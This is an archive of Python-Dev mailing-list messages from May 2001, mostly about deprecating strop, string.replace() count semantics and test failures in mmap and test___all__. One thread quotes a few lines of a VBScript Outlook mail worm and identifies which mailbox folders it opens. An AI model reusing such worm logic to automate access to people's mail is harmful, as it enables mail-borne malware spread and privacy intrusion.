In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <20010509210858.A3467@gerg.ca>

On 09 May 2001, Guido van Rossum said:
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
imported, except when imported by string.py.  (No idea how you'd
implement that, I'm just spouting off.)  Then it could go away in 2.3.

I don't think there's anything particularly controversial about 'strop'
going away after one release with a deprecation warning -- it's not
'string', after all!  (Ie. imported by every single scrap of Python code
ever written before string methods came along, and by quite a lot since
then.)

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
I joined scientology at a garage sale!!


From guido at digicool.com  Thu May 10 04:12:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:12:55 -0500
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400."
             <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com> 
Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>

> test_strop.py contains this line:
> 
>     test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0)
> 
> string_tests.py has this:
> 
>     test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)
> 
> IOW, the test suite insists that
> 
>     strop.replace('one!two!three!', '!', '@', 0)
> 
> replace all matches but that
> 
>     string.replace('one!two!three!', '!', '@', 0)
> and
>     'one!two!three!'.replace('!', '@', 0)
> 
> replace nothing.
> 
> I've been thrashing like a madman trying to fix a common bug in both modules
> (in out-of-synch copies of mymemreplace), and every time I think I fix
> something "the other" module breaks.  The above appears to be why.
> 
> My opinion:  the test_strop.py test is in error, and so was strop_replace()
> in stropmodule.c.  I'm checking in changes accordingly, but won't mind
> getting yelled at if you disagree.

HMMMMMM!  In Python 1.5, a count of zero always replaces all
occurrences, both using string and using strop.  In 2.0 and later,
strop's replace(..., 0) still replaces all, but string's replaces
none.  The replace() method of strings and unicode objects agrees with
string.py.

I think this change was made in the sake of ease of documenting the
behavior: special-casing the count of zero is unexpected.

I very vaguely recall that it was discussed on this list.

So this suggests that test_string is correct, and string.replace()
(and the methods) shouldn't be "fixed"!

But since we're not really supporting strop any more, I think that
strop shouldn't be changed either.  So we'll have to live with the
difference -- sorry!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:13:20 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:13:20 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>

[Guido]
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

So if Fred changes the docs to say it's obsolete, maybe we can actually rip
out the buggy and redundant code it contains in about 2 years <wink>.

cheeredly y'rs  - tim


From guido at digicool.com  Thu May 10 04:25:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:25:43 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400."
             <20010509210858.A3467@gerg.ca> 
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>  
            <20010509210858.A3467@gerg.ca> 
Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com>

> Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
> imported, except when imported by string.py.  (No idea how you'd
> implement that, I'm just spouting off.)  Then it could go away in 2.3.

I have had the necessary mods sitting in my directory for months (it
was one of my first tests for using the warnings module), but decided
against checking it in because I found there's quite a bit of code
that triggered the warnings.  Maybe I should check it in into 2.2a0,
so developers can get used to it.

> I don't think there's anything particularly controversial about 'strop'
> going away after one release with a deprecation warning -- it's not
> 'string', after all!  (Ie. imported by every single scrap of Python code
> ever written before string methods came along, and by quite a lot since
> then.)

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 04:27:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:27:23 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400."
             <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com> 
Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>

> [Guido]
> > In my mind, strop is obsolete.  We keep it around because some losers
> > like to import it directly, but it's basically dead, and except for a
> > few functions, string.py doesn't use it any more.  (The exceptions are
> > maketrans, lowercase, uppercase, whitespace.)
> 
> So if Fred changes the docs to say it's obsolete, maybe we can actually rip
> out the buggy and redundant code it contains in about 2 years <wink>.

Yes, but in the mean time the fact that it's buggy doesn't bother me
at all.  Let it be as buggy as it always was -- that's one more reason
to stop using it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:33:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:33:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDPKBAA.tim.one@home.com>

[Guido]
> HMMMMMM!  In Python 1.5, a count of zero always replaces all
> occurrences, both using string and using strop.  In 2.0 and later,
> strop's replace(..., 0) still replaces all, but string's replaces
> none.  The replace() method of strings and unicode objects agrees with
> string.py.
>
> I think this change was made in the sake of ease of documenting the
> behavior: special-casing the count of zero is unexpected.

Yes, -1 == infinity is much clearer <wink>.

> I very vaguely recall that it was discussed on this list.
>
> So this suggests that test_string is correct, and string.replace()
> (and the methods) shouldn't be "fixed"!

I didn't change their behavior wrt replace()'s interpretation of count, but
to repair an unrelated bug (bogus MemoryError for an empty-string *result*)
that happened to appear in both copies of mymemreplace sitting in the code
base (one in stringobject.c, another but out-of-synch one in stropmodule.c).
That's how stropmodule got sucked into this:  to fix the gross null-string
result bug common to both.

> But since we're not really supporting strop any more, I think that
> strop shouldn't be changed either.  So we'll have to live with the
> difference -- sorry!

OK, I've restored the 0 == infinity semantics to strop.replace() and
test_strop.py, but have not backed out the null-string result fix, nor the
pain to make the mymemreplace clones identical again.


From tim.one at home.com  Thu May 10 04:00:30 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:00:30 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>

[Guido]
> Yes, but in the mean time the fact that it's buggy doesn't bother me
> at all.  Let it be as buggy as it always was -- that's one more reason
> to stop using it! :-)

I think that's unsustainable in this specific case:  stringobject and
stropmodule contained several utility functions with the same names that
clearly started life as identical code.  Over time they got out of synch, and
when they punched me in the face today, I had no idea which was "right" and
which "wrong".  Turned out they both had the same bug, and the clearest way
to fix it in stringobject.c without leaving a more inconsistent x-module mess
was to bring the once-common utility routines back into synch.

As /F said, though, the mymemreplace() approach is inefficient and "should
be" replaced wholesale.  If that's done in stringobject.c alone, great, then
I won't care about the legacy routines in stropmodule.c either.  What I can't
abide is having one copy of a function in the codebase work and a clone of it
not work -- unless you can keep the undocumented history of both in your mind
at all times, you're just as likely to bump into the broken one first when
searching the code base, and if you're unlucky never  even realize it is "the
broken one" (or, if you're lucky, bump into the good one too, and then pee
away time trying to understand the differences).

i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't-
    eat-it-by-mistake<wink>-ly y'rs  - tim


From Jason.Tishler at dothill.com  Thu May 10 04:06:15 2001
From: Jason.Tishler at dothill.com (Jason Tishler)
Date: Wed, 9 May 2001 22:06:15 -0400
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500
References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com>
Message-ID: <20010509220615.A1928@dothill.com>

Mike,

On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote:
> > I am playing around with CygWin (which came with Pyhton 2.1 
> > installed).  While I can run command line programs, Tkinter is not 
> > part of the package.  TCL/TK is installed and I have been able to 
> > build TK GUI's.  How can I get Tkinter added to my Python package?  
> > Thanks.
> 
> Beats me.  Ask whoever produces the CygWin port.

I am the Cygwin Python maintainer.  Please see the following for my
views on adding Tkinter support to Cygwin Python:

    http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html

If Tkinter support is important to you, then please submit the appropriate
patches for consideration to the Python Patch Manager on SourceForge.

Norman Vine has built a Cygwin Python that supports Tkinter.  See the
following for his build procedure:

    http://www.vso.cape.com/~nhv/files/python/

Perhaps you would like to collaborate with Norman on this effort?

Thanks,
Jason

-- 
Jason Tishler
Director, Software Engineering       Phone: +1 (732) 264-8770 x235
Dot Hill Systems Corp.               Fax:   +1 (732) 264-8798
82 Bethany Road, Suite 7             Email: Jason.Tishler at dothill.com
Hazlet, NJ 07730 USA                 WWW:   http://www.dothill.com


From tim.one at home.com  Thu May 10 04:54:45 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:54:45 -0400
Subject: [Python-Dev] test_mmap failing?
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>

I checked in a change to mmapmodule.c earlier today, to close a patch
complaining about unused vrbl warnings.

Here's the changed routine before ("value" is unused):

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        char value;
        char *where;
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                where = self->data + self->pos;
                value = (char) *(where);
                self->pos += 1;
                return Py_BuildValue("c", (char) *(where));
        } else {
               PyErr_SetString (PyExc_ValueError, "read byte out of
                                                   range");
                return NULL;
        }
}

and after:

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                char value = self->data[self->pos];
                self->pos += 1;
                return Py_BuildValue("c", value);
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of
                                                    range");
                return NULL;
        }
}

I'll be damned if I can see any semantic difference, and test_mmap worked
fine on Windows after the change.  But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python
../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22]
Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in
test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an
mmap'ed file yet, let alone tried to read from it.  The only thing test_mmap
did so far is (the first comment is bogus -- that's the builtin Python open()
function):

    # Create an mmap'ed file   # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)    # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my
confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
current CVS?  Fred, are you *sure* it fails for you -- if so, does the
problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs  - tim


From jeremy at digicool.com  Thu May 10 05:17:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 9 May 2001 23:17:34 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.2126.368714.159135@slothrop.digicool.com>

The latest CVS build works on my Linux 2.2.12 system.  No problem with
test_mmap.  But test_pty does fail with some complaints about FCNTL,
which Fred just removed.  Maybe Fred is working in an alternate
universe where test_mmap and test_pty are swapped.

Jeremy


From barry at digicool.com  Thu May 10 06:08:42 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 00:08:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
	<LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
Message-ID: <15098.5194.677531.35326@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

    TP> Oh, fuck.  Somebody remind me why we have both stropmodule.c
    TP> and stringobject.c?  These bugs exist in both.

IIRC, I once proposed to share code bases through elaborate
#includes and exported functions, but that never went very far.
Guido's already pronounced on this, and I'd say good riddance to
strop.

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Yes, but in the mean time the fact that it's buggy doesn't
    GvR> bother me at all.  Let it be as buggy as it always was --
    GvR> that's one more reason to stop using it! :-)
-----------------------------------^^^^

For a minute there, I thought you said "to strop using it". :)

-Barry


From fredrik at pythonware.com  Thu May 10 08:22:53 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 10 May 2001 08:22:53 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid>

Tim Peters wrote:
> I think that's unsustainable in this specific case:  stringobject and
> stropmodule contained several utility functions with the same names that
> clearly started life as identical code.  Over time they got out of synch, and
> when they punched me in the face today, I had no idea which was "right" and
> which "wrong".  Turned out they both had the same bug, and the clearest way
> to fix it in stringobject.c without leaving a more inconsistent x-module mess
> was to bring the once-common utility routines back into synch.
> 
> As /F said, though, the mymemreplace() approach is inefficient and "should
> be" replaced wholesale.  If that's done in stringobject.c alone, great, then
> I won't care about the legacy routines in stropmodule.c either.

as a footnote, SRE uses the same source code to generate
both 8-bit and 16-bit versions of the match engine.  I see no
reason why we cannot do the same for the string operations
(PyString, PyUnicode, and strop).

if anyone wants me to look into this, just say "go ahead".  

> > no wonder u"".replace() is 30% faster than "".replace() ;-)
> 
> For a given number of characters or bytes <wink>?

characters.  judging from the SRE benchmarks, modern platforms
can process 16-bit characters as fast as they can process 8-bit
characters.

Cheers /F


From thomas at xs4all.net  Thu May 10 11:31:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 10 May 2001 11:31:38 +0200
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200
References: <200105091712.TAA05172@core.inf.ethz.ch>
Message-ID: <20010510113138.K16486@xs4all.nl>

On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote:

> Set s=CreateObject("Outlook.Application")
> Set t=s.GetNameSpace("MAPI")
> Set u=t.GetDefaultFolder(6)

[..]

> Set u=t.GetDefaultFolder(3)

I know it's off-topic, but Greg started it! ;-) Does anyone know which
folders those two 'GetDefaultFolder' statements open ? I suspect it's
sent-mail and trash, or some such, but I don't know enough about Outlook to
know if it even *has* sent-mail and trash folders :)

Thanx for sending it through, Samuele, it was fun reading, and useful to our
helpdesk (especially the fact that it only sends out mails once, even though
it starts the porn page every time, and that it doesn't do anything harmful
at all.)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From MarkH at ActiveState.com  Thu May 10 12:36:13 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Thu, 10 May 2001 20:36:13 +1000
Subject: [Python-Dev] Homepage
In-Reply-To: <20010510113138.K16486@xs4all.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEEPDMAA.MarkH@ActiveState.com>

> > Set u=t.GetDefaultFolder(6)
> > Set u=t.GetDefaultFolder(3)

> I know it's off-topic, but Greg started it! ;-) Does anyone know which
> folders those two 'GetDefaultFolder' statements open ? I suspect it's
> sent-mail and trash, or some such, but I don't know enough about 
> Outlook to
> know if it even *has* sent-mail and trash folders :)

Running makepy.py over the Outlook type library yields the following:

	olFolderCalendar              =0x9        # from enum OlDefaultFolders
	olFolderContacts              =0xa        # from enum OlDefaultFolders
	olFolderDeletedItems          =0x3        # from enum OlDefaultFolders
	olFolderDrafts                =0x10       # from enum OlDefaultFolders
	olFolderInbox                 =0x6        # from enum OlDefaultFolders
	olFolderJournal               =0xb        # from enum OlDefaultFolders
	olFolderNotes                 =0xc        # from enum OlDefaultFolders
	olFolderOutbox                =0x4        # from enum OlDefaultFolders
	olFolderSentMail              =0x5        # from enum OlDefaultFolders
	olFolderTasks                 =0xd        # from enum OlDefaultFolders

So it appears the inbox and deleted items.

Mark.


From tim.one at home.com  Thu May 10 10:54:42 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 10 May 2001 04:54:42 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
Message-ID: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>

> python  ../lib/test/regrtest.py test___all__

test___all__
test test___all__ failed -- tty has no __all__ attribute
1 test failed: test___all__

C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious
sequence of failing imports manages to leave behind a damaged module object
in sys.modules that prevents test___all__'s import of tty from getting the
ImportError it *ought* to get under Windows (and betting termios is the
ultimate culprit).

I've fixed enough of these.  Somebody who thinks this is "a feature" gets to
do it this time <wink/snarl>.


From guido at digicool.com  Thu May 10 15:43:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 08:43:07 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400."
             <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com> 
Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com>

> [Guido]
> > Yes, but in the mean time the fact that it's buggy doesn't bother
> > me at all.  Let it be as buggy as it always was -- that's one more
> > reason to stop using it! :-)

[Tim]
> I think that's unsustainable in this specific case: stringobject and
> stropmodule contained several utility functions with the same names
> that clearly started life as identical code.  Over time they got out
> of synch, and when they punched me in the face today, I had no idea
> which was "right" and which "wrong".  Turned out they both had the
> same bug, and the clearest way to fix it in stringobject.c without
> leaving a more inconsistent x-module mess was to bring the
> once-common utility routines back into synch.

Of course, the real bug was copy-and-paste programming.  The common
code should have been factored out rather than copied.

> As /F said, though, the mymemreplace() approach is inefficient and
> "should be" replaced wholesale.  If that's done in stringobject.c
> alone, great, then I won't care about the legacy routines in
> stropmodule.c either.  What I can't abide is having one copy of a
> function in the codebase work and a clone of it not work -- unless
> you can keep the undocumented history of both in your mind at all
> times, you're just as likely to bump into the broken one first when
> searching the code base, and if you're unlucky never even realize it
> is "the broken one" (or, if you're lucky, bump into the good one
> too, and then pee away time trying to understand the differences).

Here's an idea.  We remove stropmodule.c, and replace it with a
strop.py that issues a warning and then imports selected things from
string.py.

The only complication is that there are a few constants and one
function in strop that are still imported into string.py; I propose to
move these to an "internal" extension module (e.g. "_string").

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 16:02:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 09:02:59 -0500
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400."
             <15098.2126.368714.159135@slothrop.digicool.com> 
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>  
            <15098.2126.368714.159135@slothrop.digicool.com> 
Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com>

> The latest CVS build works on my Linux 2.2.12 system.  No problem with
> test_mmap.  But test_pty does fail with some complaints about FCNTL,
> which Fred just removed.  Maybe Fred is working in an alternate
> universe where test_mmap and test_pty are swapped.

Strange.  The *both* work for me with the latest CVS (and even after
removing all *.pyc files!), although last night (?) I recall seeing a
test_pty faulure too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Thu May 10 16:16:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:16:24 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
	<200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <15098.41656.128146.826459@beluga.mojam.com>

    Guido> Yes, but in the mean time the fact that it's buggy doesn't bother
    Guido> me at all.  Let it be as buggy as it always was -- that's one
    Guido> more reason to stop using it! :-)

In fact, perhaps the import warning could mention that strop is buggy and
won't be fixed... :-)

Skip


From skip at pobox.com  Thu May 10 16:32:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:32:15 -0500
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
Message-ID: <15098.42607.84670.323361@beluga.mojam.com>

    >> python  ../lib/test/regrtest.py test___all__
    Tim> test___all__
    Tim> test test___all__ failed -- tty has no __all__ attribute
    Tim> 1 test failed: test___all__

grumble, grumble...

    Tim> I assume this is yet another case where some excruciatingly
    Tim> non-obvious sequence of failing imports manages to leave behind a
    Tim> damaged module object in sys.modules that prevents test___all__'s
    Tim> import of tty from getting the ImportError it *ought* to get under
    Tim> Windows (and betting termios is the ultimate culprit).

I (thankfully) gave up even pretending to run Windows recently, so I can
only make a suggestion for others who look into this problem.  Try this:
Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails.  You should get the actual module
that failed to import.  If foo.py consists of simply "import bar", and I
import it, I see that bar couldn't be imported:

    >>> try:
    ...   import foo
    ... except ImportError, msg:
    ...   print msg
    ... 
    No module named bar

Skip


From fdrake at acm.org  Thu May 10 16:57:59 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:57:59 -0400 (EDT)
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > But having suffered too many "impossible problems" the last 36 hours, my
 > confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
 > current CVS?  Fred, are you *sure* it fails for you -- if so, does the
 > problem actually go away if you revert mmapmodule.c?

  It was indeed showing the behavior I described!  I figured out what
it was this morning and closed the patch again.
  The problem, of course(!), had nothing to do with mmap, before or
after any of the recent changes to mmap.  Or any old changes.  It had
a lot to do with the change I made to the socket module.  ;-)
  While figuring out the reported bug in the socket module, I created
named pipes, including one named "foo".  The mmap test opens a file
"foo" with mode "w+" in the directory in which I just happened to
create the named pipe, so it ended up with a file object opened on a
pipe -- things just don't work the same for these beasts!  Needless to
say test_mmap failed with a cryptic error message.
  This begs the question, though -- should tests that create temp
files check that the files don't already exist, and fail with a more
descriptive error if they do?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Thu May 10 16:59:08 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:59:08 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
	<15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com>

Jeremy Hylton writes:
 > The latest CVS build works on my Linux 2.2.12 system.  No problem with
 > test_mmap.  But test_pty does fail with some complaints about FCNTL,
 > which Fred just removed.  Maybe Fred is working in an alternate
 > universe where test_mmap and test_pty are swapped.

  Or, I could just be working in an alternate universe altogether.
I've been known to do that....


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From paulp at ActiveState.com  Thu May 10 23:55:36 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 14:55:36 -0700
Subject: [Python-Dev] Type/class
Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com>

-------- Original Message --------
Log Message:

Make attributes of subtypes writable, but only for dynamic subtypes
derived in Python using a class statement; static subtypes derived in
C still have read-only attributes.
-------- Original Message --------

I would like to argue that "plain old C types" should act as if they
have __dict__s for consistency with other types. It is sometimes useful
to be able to annotate objects by adding attributes to them. But this
only works with class instance objects, not instances of types.

 Paul Prescod


From jeremy at digicool.com  Thu May 10 23:59:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 10 May 2001 17:59:34 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <15099.3910.648127.25900@slothrop.digicool.com>

>>>>> "PP" == Paul Prescod <paulp at ActiveState.com> writes:

  PP> I would like to argue that "plain old C types" should act as if
  PP> they have __dict__s for consistency with other types. It is
  PP> sometimes useful to be able to annotate objects by adding
  PP> attributes to them. But this only works with class instance
  PP> objects, not instances of types.

Every type should have an __dict__ of type dict?  Then every dict
must have an __dict__, including the __dict__ of __dict__?

Once every object has an __dict__, every object will be mutable.  Then
no object will be usable as a dict key and we can get rid of dict's
entirely.

Jeremy


From fdrake at cj42289-a.reston1.va.home.com  Fri May 11 00:47:14 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 18:47:14 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update for the maintenance version docs.


From fdrake at cj42289-a.reston1.va.home.com  Fri May 11 01:04:40 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 19:04:40 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for the development version of the docs.


From guido at digicool.com  Fri May 11 02:03:13 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 19:03:13 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST."
             <3AFB0E58.1F0ABCA6@ActiveState.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> 
Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com>

Glad somebody is watching what I'm doing here -- I was afraid I was
having too much fun by myself! :-)

> -------- Original Message --------
> Log Message:
> 
> Make attributes of subtypes writable, but only for dynamic subtypes
> derived in Python using a class statement; static subtypes derived in
> C still have read-only attributes.
> -------- Original Message --------
> 
> I would like to argue that "plain old C types" should act as if they
> have __dict__s for consistency with other types.

Good point.  Plain old types currently (in the descr-branch) have a
readonly dict (using a proxy) and no settable attributes.  I will
probably give types settable attributes in a next revision, but I
prefer not to make the type's dict writable -- I need to be able to
watch the setattr calls so that if someone changes
DictType.__getitem__ I can change the mp_subscript to a C function
that calls the __getitem__ method.  For speed reasons, if you don't
override them, the C tp_slot functions carry out the operation
directly, and the __slot__ methods call the C tp_slot functions; but
when __slot__ is overridden, tp_slot must call __slot__.

> It is sometimes useful
> to be able to annotate objects by adding attributes to them. But this
> only works with class instance objects, not instances of types.
> 
>  Paul Prescod

If you're talking about *instances*: instances of subtypes of built-in
types have a dict of their own to which you can add stuff to your
heart's content.  Instances of built-in types will continue not to
have a dict (it would cost too much space if *every* object had a
dict, even if it was a NULL pointer when no attrs are defined).

If you mean you want to annotate types like you can annotate classes,
that should be possible once I implement what I describe above.

